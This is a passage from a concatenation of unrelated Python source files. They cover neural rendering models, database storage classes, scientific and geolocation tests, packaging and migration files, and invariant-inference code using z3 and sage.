hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.color_layer_sine[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) # x = torch.cat([shared_features, input], -1) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([shared_features, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR_debug(nn.Module): """ 1. Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network; 2. remove view direction 3. add more color layers """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.color_layer_sine[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) # x = torch.cat([shared_features, input], -1) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([shared_features, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR_debug2(nn.Module): """ 1. Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network; 2. remove view direction 3. add more color layers """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) # self.color_layer_sine[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) # x = torch.cat([shared_features, input], -1) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([shared_features, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN256SEMANTICDISENTANGLE_WO_DIR_DIM_96(TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs, hidden_dim=256) self.spatial_embeddings = nn.Parameter(torch.randn(1,32,96,96,96)*0.1) def main(): # model = SPATIALSIRENVOLUME(input_dim=3, z_dim=256, hidden_dim=256, output_dim=4, device=None) model = SPATIALSIRENSEMANTIC(input_dim=3, z_dim=256, hidden_dim=256, output_dim=4, device=None) input, z, ray_directions = torch.randn(2, 4000, 3), torch.rand(2, 256), torch.rand(2, 4000, 3) output = model(input, z, ray_directions) print(output.shape) if __name__ == "__main__": main()
11589949
from abc import ABCMeta, abstractmethod from six import add_metaclass @add_metaclass(ABCMeta) class InitDataInterface(object): """ Interface that represents all data store interactions required by __init__. """ @abstractmethod def is_app_repository(self, namespace_name, repository_name): """ Args: namespace_name: namespace or user repository_name: repository Returns: Boolean """ pass @abstractmethod def repository_is_public(self, namespace_name, repository_name): """ Args: namespace_name: namespace or user repository_name: repository Returns: Boolean """ pass @abstractmethod def log_action(self, kind, namespace_name, repository_name, performer, ip, metadata): """ Args: kind: type of log user_or_orgname: name of user or organization performer: user doing the action ip: originating ip metadata: metadata repository: repository the action is related to Returns: None """ pass
11589962
from .selfsupervised_patches import SelfSupervisedDataset def load_dataset(dataset_name, data_path, normal_class, cfg): """Loads the dataset.""" implemented_datasets = ('selfsupervised') assert dataset_name in implemented_datasets dataset = None if dataset_name == 'selfsupervised': dataset = SelfSupervisedDataset(root=data_path, train=cfg.settings['train_folder'], val_pos=cfg.settings['val_pos_folder'], val_neg=cfg.settings['val_neg_folder'], rgb=cfg.settings['rgb'], ir=cfg.settings['ir'], depth=cfg.settings['depth'], depth_3d=cfg.settings['depth_3d'], normals=cfg.settings['normals'], normal_angle=cfg.settings['normal_angle']) return dataset
11590026
import io class TqdmBuffer(io.StringIO): foo = "" buf = "" def __init__(self): super(TqdmBuffer, self).__init__() def write(self, buf): TqdmBuffer.foo = buf.strip("\r\n\t ") def flush(self): TqdmBuffer.buf = TqdmBuffer.foo
11590043
from typing import List, Tuple, Dict from collections import defaultdict from sqlalchemy.sql import text as sql from ..common.story_key import StoryId from ..common.story_data import StoryData from .postgres_client import PostgresClient from .postgres_sharding import sharding_for _KEY = Tuple[int, int] class PostgresStoryStorage: def __init__(self, client: PostgresClient): self._client = client def get_content(self, feed_id: int, offset: int) -> str: r = self.batch_get_content([(feed_id, offset)]) if not r: return None _, content = r[0] return content def delete_content(self, feed_id: int, offset: int) -> None: self.batch_delete_content([(feed_id, offset)]) def save_content(self, feed_id: int, offset: int, content: str) -> None: self.batch_save_content([((feed_id, offset), content)]) @classmethod def _split_by(cls, items: list, by: callable) -> dict: groups = defaultdict(list) for item in items: groups[by(item)].append(item) return groups @classmethod def _split_keys(cls, keys: List[_KEY]) -> Dict[int, List[_KEY]]: return cls._split_by(keys, lambda x: sharding_for(x[0])) @classmethod def _split_items(cls, items: List[Tuple[_KEY, str]]) -> Dict[int, List[Tuple[_KEY, str]]]: return cls._split_by(items, lambda x: sharding_for(x[0][0])) @staticmethod def _to_id_tuple(keys: List[_KEY]) -> tuple: return tuple(StoryId.encode(feed_id, offset) for feed_id, offset in keys) def batch_get_content(self, keys: List[_KEY]) -> List[Tuple[_KEY, str]]: result = [] if not keys: return result groups = self._split_keys(keys) for volume, group_keys in groups.items(): result.extend(self._batch_get_content(volume, group_keys)) return result def _batch_get_content(self, volume: int, keys: List[_KEY]) -> List[Tuple[_KEY, str]]: q = sql(""" SELECT id, content FROM {table} WHERE id IN :id_tuple """.format(table=self._client.get_table(volume))) id_tuple = self._to_id_tuple(keys) with self._client.get_engine(volume).connect() as conn: rows = list(conn.execute(q, id_tuple=id_tuple).fetchall()) result = [] for story_id, content_data in rows: key = StoryId.decode(story_id) if content_data: content = StoryData.decode_text(content_data) else: content = None result.append((key, content)) return result def batch_delete_content(self, keys: List[_KEY]) -> None: if not keys: return groups = self._split_keys(keys) for volume, group_keys in groups.items(): self._batch_delete_content(volume, group_keys) def _batch_delete_content(self, volume: int, keys: List[_KEY]) -> None: q = sql(""" DELETE FROM {table} WHERE id IN :id_tuple """.format(table=self._client.get_table(volume))) id_tuple = self._to_id_tuple(keys) with self._client.get_engine(volume).connect() as conn: with conn.begin(): conn.execute(q, id_tuple=id_tuple) def batch_save_content(self, items: List[Tuple[_KEY, str]]) -> None: if not items: return groups = self._split_items(items) for volume, group_items in groups.items(): self._batch_save_content(volume, group_items) def _batch_save_content(self, volume: int, items: List[Tuple[_KEY, str]]) -> None: q = sql(""" INSERT INTO {table} (id, content) VALUES (:id, :content) ON CONFLICT (id) DO UPDATE SET content = EXCLUDED.content """.format(table=self._client.get_table(volume))) params = [] for (feed_id, offset), content in items: story_id = StoryId.encode(feed_id, offset) if content: content_data = StoryData.encode_text(content) else: content_data = b'' params.append({'id': story_id, 'content': content_data}) with self._client.get_engine(volume).connect() as conn: with conn.begin(): conn.execute(q, params)
11590044
import numpy as np import pytest from nilearn._utils.data_gen import generate_group_sparse_gaussian_graphs from nilearn.connectome.group_sparse_cov import (group_sparse_covariance, group_sparse_scores) from nilearn.connectome import GroupSparseCovariance, GroupSparseCovarianceCV def test_group_sparse_covariance(): # run in debug mode. Should not fail # without debug mode: cost must decrease. signals, _, _ = generate_group_sparse_gaussian_graphs( density=0.1, n_subjects=5, n_features=10, min_n_samples=100, max_n_samples=151, random_state=np.random.RandomState(0)) alpha = 0.1 # These executions must hit the tolerance limit emp_covs, omega = group_sparse_covariance(signals, alpha, max_iter=20, tol=1e-2, debug=True, verbose=0) emp_covs, omega2 = group_sparse_covariance(signals, alpha, max_iter=20, tol=1e-2, debug=True, verbose=0) np.testing.assert_almost_equal(omega, omega2, decimal=4) class Probe(object): def __init__(self): self.objective = [] def __call__(self, emp_covs, n_samples, alpha, max_iter, tol, n, omega, omega_diff): if n >= 0: _, objective = group_sparse_scores(omega, n_samples, emp_covs, alpha) self.objective.append(objective) # Use a probe to test for number of iterations and decreasing objective. probe = Probe() emp_covs, omega = group_sparse_covariance( signals, alpha, max_iter=4, tol=None, verbose=0, probe_function=probe) objective = probe.objective # check number of iterations assert len(objective) == 4 # np.testing.assert_array_less is a strict comparison. # Zeros can occur in np.diff(objective). assert np.all(np.diff(objective) <= 0) assert omega.shape == (10, 10, 5) # Test input argument checking pytest.raises(ValueError, group_sparse_covariance, signals, "") pytest.raises(ValueError, group_sparse_covariance, 1, alpha) pytest.raises(ValueError, group_sparse_covariance, [np.ones((2, 2)), np.ones((2, 3))], alpha) # Check consistency between classes gsc1 = GroupSparseCovarianceCV(alphas=4, tol=1e-1, max_iter=20, verbose=0, early_stopping=True) gsc1.fit(signals) gsc2 = GroupSparseCovariance(alpha=gsc1.alpha_, tol=1e-1, max_iter=20, verbose=0) gsc2.fit(signals) np.testing.assert_almost_equal(gsc1.precisions_, gsc2.precisions_, decimal=4)
11590069
import logging try: from ms_deisotope.data_source._vendor.AgilentD import ( AgilentDLoader, register_dll_dir, AgilentDScanPtr, AgilentDDataInterface, log as _api_logger) from comtypes import COMError comtypes_logger = logging.getLogger("comtypes") comtypes_logger.setLevel("INFO") _api_logger.setLevel("INFO") def is_agilent_d_dir(path): try: AgilentDLoader(path) return True except (WindowsError, IOError, ImportError, COMError): return False def infer_reader(path): if is_agilent_d_dir(path): return AgilentDLoader raise ValueError("Not Agilent .d Directory") def determine_if_available(): try: AgilentDLoader.create_com_object() return True except (WindowsError, COMError): return False except ImportError as e: message = str(e) def is_agilent_d_dir(path): return False def infer_reader(path): raise ValueError(message) def register_dll_dir(paths): print("no-op: %s" % (message,)) return False def determine_if_available(): print("no-op: %s" % (message,)) return False class AgilentDLoader(object): def __init__(self, *args, **kwargs): raise ImportError(message)
11590090
from ichnaea.api.locate.internal import InternalRegionSource from ichnaea.api.locate.score import area_score, station_score from ichnaea.api.locate.tests.base import BaseSourceTest from ichnaea.geocode import GEOCODER from ichnaea.tests.factories import BlueShardFactory, CellAreaFactory, WifiShardFactory from ichnaea import util class TestRegionSource(BaseSourceTest): Source = InternalRegionSource api_type = "region" def test_blue(self, geoip_db, http_session, session, source, metricsmock): """Bluetooth stations can be used to determine the region.""" now = util.utcnow() region = GEOCODER.regions_for_mcc(235, metadata=True)[0] blue1 = BlueShardFactory(samples=10) blue2 = BlueShardFactory(samples=20) blue3 = BlueShardFactory.build(region="DE", samples=100) session.flush() query = self.model_query( geoip_db, http_session, session, blues=[blue1, blue2, blue3] ) results = source.search(query) self.check_model_results(results, [region]) best_result = results.best() assert best_result.region_code == region.code assert best_result.score == station_score(blue1, now) + station_score( blue2, now ) metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_blue_miss(self, geoip_db, http_session, session, source): """Unknown Bluetooth stations fail to determine the region.""" blues = BlueShardFactory.build_batch(2, samples=10) session.flush() query = self.model_query(geoip_db, http_session, session, blues=blues) results = source.search(query) self.check_model_results(results, None) def test_from_mcc(self, geoip_db, http_session, session, source, metricsmock): region = GEOCODER.regions_for_mcc(235, metadata=True)[0] area = CellAreaFactory(mcc=235, num_cells=10) session.flush() query = self.model_query(geoip_db, http_session, session, cells=[area]) results = source.search(query) self.check_model_results(results, [region]) assert results[0].score == 1.0 metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_ambiguous_mcc(self, geoip_db, http_session, session, source, metricsmock): now = util.utcnow() regions = GEOCODER.regions_for_mcc(234, metadata=True) area = CellAreaFactory(mcc=234, num_cells=10) session.flush() query = self.model_query(geoip_db, http_session, session, cells=[area]) results = source.search(query) self.check_model_results(results, regions) assert results.best().region_code == "GB" for result in results: score = 0.25 if result.region_code == "GB": score += area_score(area, now) assert result.score == score metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_multiple_mcc(self, geoip_db, http_session, session, source): now = util.utcnow() region = GEOCODER.regions_for_mcc(235, metadata=True)[0] area = CellAreaFactory(mcc=234, num_cells=6) area2 = CellAreaFactory(mcc=235, num_cells=8) session.flush() query = self.model_query(geoip_db, http_session, session, cells=[area, area2]) results = source.search(query) assert len(results) > 2 best_result = results.best() assert best_result.region_code == region.code assert best_result.score == 1.25 + area_score(area, now) def test_invalid_mcc(self, geoip_db, http_session, session, source): area = CellAreaFactory.build(mcc=235, num_cells=10) area.mcc = 999 query = self.model_query(geoip_db, http_session, session, cells=[area]) results = source.search(query) self.check_model_results(results, None) def test_wifi(self, geoip_db, http_session, session, source, metricsmock): now = util.utcnow() region = GEOCODER.regions_for_mcc(235, metadata=True)[0] wifi1 = WifiShardFactory(samples=10) wifi2 = WifiShardFactory(samples=20) wifi3 = WifiShardFactory.build(region="DE", samples=100) session.flush() query = self.model_query( geoip_db, http_session, session, wifis=[wifi1, wifi2, wifi3] ) results = source.search(query) self.check_model_results(results, [region]) best_result = results.best() assert best_result.region_code == region.code assert best_result.score == station_score(wifi1, now) + station_score( wifi2, now ) metricsmock.assert_incr_once( self.api_type + ".source", tags=["key:test", "source:internal", "accuracy:low", "status:hit"], ) def test_wifi_miss(self, geoip_db, http_session, session, source): wifis = WifiShardFactory.build_batch(2, samples=10) session.flush() query = self.model_query(geoip_db, http_session, session, wifis=wifis) results = source.search(query) self.check_model_results(results, None)
11590096
import setuptools with open("README.rst", "r") as fh: long_description = fh.read() setuptools.setup( name='django_searchable', packages=setuptools.find_packages(), install_requires=[ 'Django>=2.x', 'psycopg2-binary>=2.7.4', ], long_description=long_description, version='0.1.2', description='Easy FTS with Django and PostgreSQL', author='<NAME>', author_email='<EMAIL>', url='https://github.com/rjauquet/django-searchable', download_url='https://github.com/rjauquet/django-searchable/archive/0.1.2.tar.gz', keywords=['search', 'searchable', 'fts'], classifiers=[], )
11590117
from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('documents', '0067_auto_20201024_1120'), ] operations = [ migrations.DeleteModel( name='DeletedDocument', ), migrations.RenameField( model_name='document', old_name='deleted_date_time', new_name='trashed_date_time', ), ]
11590135
from typing import Type from StructNoSQL import ExternalDynamoDBApiCachingTable, TableDataModel, PrimaryIndex, ExternalDynamoDBApiBasicTable class InoftVocalEngineBasicTable(ExternalDynamoDBApiBasicTable): def __init__( self, data_model: Type[TableDataModel], table_id: str, region_name: str, engine_account_id: str, engine_project_id: str, engine_api_key: str, ): self.engine_table_id = table_id self.engine_account_id = engine_account_id self.engine_project_id = engine_project_id super().__init__( api_http_endpoint=f'http://127.0.0.1:5000/api/v1/{self.engine_account_id}/{self.engine_project_id}/database-client?accessToken={engine_api_key}', primary_index=PrimaryIndex(hash_key_name='accountProjectTableKeyId', hash_key_variable_python_type=str), data_model=data_model, base_payload={'tableId': table_id} ) class InoftVocalEngineCachingTable(ExternalDynamoDBApiCachingTable): def __init__( self, data_model: Type[TableDataModel], table_id: str, region_name: str, engine_account_id: str, engine_project_id: str, engine_api_key: str, ): self.engine_table_id = table_id self.engine_account_id = engine_account_id self.engine_project_id = engine_project_id super().__init__( api_http_endpoint=f'http://127.0.0.1:5000/api/v1/{self.engine_account_id}/{self.engine_project_id}/database-client?accessToken={engine_api_key}', primary_index=PrimaryIndex(hash_key_name='accountProjectTableKeyId', hash_key_variable_python_type=str), data_model=data_model, base_payload={'tableId': table_id} )
11590194
import operator import pdb import z3 import sage.all import helpers.vcommon as CM from helpers.miscs import Miscs import settings import infer.base from data.traces import Traces, DTraces from data.inv.base import Inv from data.inv.invs import Invs, DInvs from data.inv.eqt import Eqt from data.inv.oct import Oct from data.inv.prepost import PrePost DBG = pdb.set_trace mlog = CM.getLogger(__name__, settings.LOGGER_LEVEL) class Infer(infer.base.Infer): def __init__(self, symstates, prog): super().__init__(symstates, prog) self.use_reals = self.symstates.use_reals def gen(self, dinvs, dtraces): assert isinstance(dinvs, DInvs), dinvs assert isinstance(dtraces, DTraces), dtraces dinvs_ = DInvs() post_locs = [loc for loc in dinvs if settings.POST_LOC in loc] for loc in post_locs: postconds = [self.get_postconds(inv.inv) for inv in dinvs[loc] if isinstance(inv, Eqt)] postconds = [pcs for pcs in postconds if pcs] postconds = set(p for pcs in postconds for p in pcs) preposts = [] for postcond in postconds: prepost = self.get_preposts(loc, postcond, dtraces) if prepost: preposts.append(prepost) if preposts: dinvs_[loc] = Invs(preposts) # preposts = self.get_preposts(loc, postconds, traces[loc]) # if preposts: # dinvs_[loc] = Invs(preposts) return dinvs_ @property def preconds(self): try: return self._preconds except AttributeError: symbols = self.prog.inp_decls.sageExprs self._preconds = self.get_preconds(symbols, term_siz=2) return self._preconds def get_preposts(self, loc, postcond, dtraces): assert isinstance(loc, str), loc assert postcond.operator() == operator.eq, postcond postcond_expr = Eqt(postcond).expr(self.use_reals) import infer.opt solver = infer.opt.Ieq(self.symstates, self.prog) preconds = solver.gen(dtraces, [loc], postcond_expr) preconds = list(preconds[loc]) if loc in preconds else [] print('hi', postcond, preconds) #conj_preconds = self.get_conj_preconds(loc, preconds, postcond) if preconds: precond_expr = z3.And([pc.expr(self.use_reals) for pc in preconds]) inv = z3.Implies(precond_expr, postcond_expr) cexs, isSucc = self.symstates.mcheck_d(loc, inv, None, 1) if not cexs and isSucc: prepost = PrePost(Invs(preconds), postcond, stat=Inv.PROVED) prepost.is_conj = True return prepost else: return None return None # def get_preposts(self, loc, postconds, traces): # assert isinstance(loc, str), loc # assert isinstance(postconds, set) and postconds, postconds # assert all(p.operator() == operator.eq for p in postconds), postconds # assert isinstance(traces, Traces), traces # preconds = [pc for pc in self.preconds] # # preconds = [pc for pc in self.preconds # # if self._check(pc.expr(self.use_reals), loc, check_consistency=True)] # #print("preconds", preconds) # postconds = sorted(postconds, key=lambda d: len(str(d))) # postconds = [Eqt(p) for p in postconds] # # find traces satifies each postcond # ptraces = {p: Traces([t for t in traces if p.test_single_trace(t)]) # for p in postconds} # preposts = [] # results # def myappend(mypreconds, is_conj): # # TODO: check, stat=Inv.PROVED ? # prepost = PrePost(Invs(mypreconds), postcond, stat=Inv.PROVED) # prepost.is_conj = is_conj # preposts.append(prepost) # postconds = sorted( # postconds, key=lambda d: len(ptraces[d]), reverse=True) # idxs = list(range(len(postconds))) # for idx in idxs: # print('gh1') # postcond = postconds[idx] # try: # postcond_expr = postcond.expr(self.use_reals) # except NotImplementedError as ex: # # cannot parse something like sqrt(x) # continue # #print("postcond", postcond) # print('gh1a') # others = [postconds[i] for i in idxs[:idx] + idxs[idx+1:]] # traces_ = [t for t in ptraces[postcond] # if all(t not in ptraces[other] for other in others)] # traces_ = Traces(traces_) # conj_preconds = [pc for pc in preconds if pc.test(traces_)] # #print(conj_preconds, conj_preconds) # conj_preconds = self.get_conj_preconds( # loc, conj_preconds, postcond_expr) # #print('cpreconds', conj_preconds) # if conj_preconds: # myappend(conj_preconds, is_conj=True) # print('gh1b') # disj_preconds = self.get_disj_preconds( # loc, preconds, postcond_expr, traces) # print('gh1b@@@') # #print('dpreconds', disj_preconds) # if disj_preconds: # myappend(disj_preconds, is_conj=False) # print('gh1c') # print('gh2') # preposts = Invs(preposts) # print('gh3') # print(preposts) # #preposts = preposts.simplify(self.use_reals) # return preposts def check(self, pcs, postcond_expr, loc): precond_expr = z3.And(pcs) if isinstance(pcs, list) else pcs inv = z3.Implies(precond_expr, postcond_expr) return self._check(inv, loc, check_consistency=False) def _check(self, inv, loc, check_consistency): cexs, isSucc = self.symstates.mcheck_d(loc, inv, None, 1) if check_consistency: if cexs: # satisfies return True return False else: if cexs or not isSucc: # mlog.debug("{}: discard {}".format(loc, inv)) return False return True def get_disj_preconds(self, loc, preconds, postcond_expr, traces): assert all(isinstance(p, Inv) for p in preconds), preconds assert z3.is_expr(postcond_expr), postcond_expr preconds_ = [] for pc in preconds: if self.check(pc.expr(self.use_reals), postcond_expr, loc): #print("hello: {} => {}".format(pc, postcond_expr)) preconds_.append(pc) if len(preconds_) >= 2: is_conj = False preconds_ = Invs._simplify(preconds_, is_conj, self.use_reals) return preconds_ def get_conj_preconds(self, loc, preconds, postcond_expr): """ preconds => post can be strengthened by removing some preconds e.g., a&b => post is stronger than a&b&c => post """ assert all(isinstance(p, Inv) for p in preconds), preconds assert z3.is_expr(postcond_expr), postcond_expr if not preconds: return [] preconds = sorted(preconds, key=lambda p: len(Miscs.get_vars(p.inv))) preconds_exprs = [pc.expr(self.use_reals) for pc in preconds] if not self.check(preconds_exprs, postcond_expr, loc): return [] def _imply(js, _): jexprs = [preconds_exprs[j] for j in js] return self.check(jexprs, postcond_expr, loc) results = Miscs.simplify_idxs(list(range(len(preconds))), _imply) results = [preconds[i] for i in results] return results @classmethod def get_postconds(cls, eqt): assert Miscs.is_expr(eqt), eqt assert eqt.operator() == operator.eq, eqt # tCtr symbols = [s for s in Miscs.get_vars(eqt) if settings.CTR_VAR in str(s)] if not symbols: return assert len(symbols) == 1, \ "should only have 1 tCtr symbol: {}, {}".format( symbols, settings.CTR_VAR) postconds = sage.all.solve(eqt, symbols[0]) return postconds if len(postconds) >= 1 else None # PRIVATE METHODS @classmethod def get_preconds(cls, symbols, term_siz): """ sage: x,y,z = sage.all.var('x y z') #doctest: +NORMALIZE_WHITESPACE sage: sorted(CegirPrePosts._preconds([x,y], 2), key=str) [-x + y < 0, -x + y <= 0, -x - y < 0, -x - y <= 0, -x < 0, -x <= 0, -y < 0, -y <= 0, x + y < 0, x + 